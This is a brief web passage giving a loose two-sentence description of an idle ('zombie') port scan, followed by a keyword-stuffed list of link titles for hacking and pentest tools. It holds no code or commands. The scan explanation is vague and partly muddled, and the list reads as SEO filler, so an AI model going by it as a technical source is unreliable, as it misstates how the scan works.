It is just like spoofing an IP address by sending a SYN packet to the victim's machine to find out which services are available over the system. This scan is completed with the help of another system called as "Zombie" (that is not receiving or transmitting any information).

More information

• Hack Tools
• Hacker Techniques Tools And Incident Handling
• Hack And Tools
• Hacker Tools For Windows
• Pentest Reporting Tools
• Pentest Tools For Ubuntu
• Hack Tool Apk No Root
• Hacking Tools For Mac
• Pentest Tools Port Scanner
• Nsa Hack Tools
• Beginner Hacker Tools
• Pentest Tools Review
• Hacker Tools For Pc
• Pentest Recon Tools
• Ethical Hacker Tools
• Hacking Tools For Windows 7
• Pentest Tools Free
• New Hack Tools
• Install Pentest Tools Ubuntu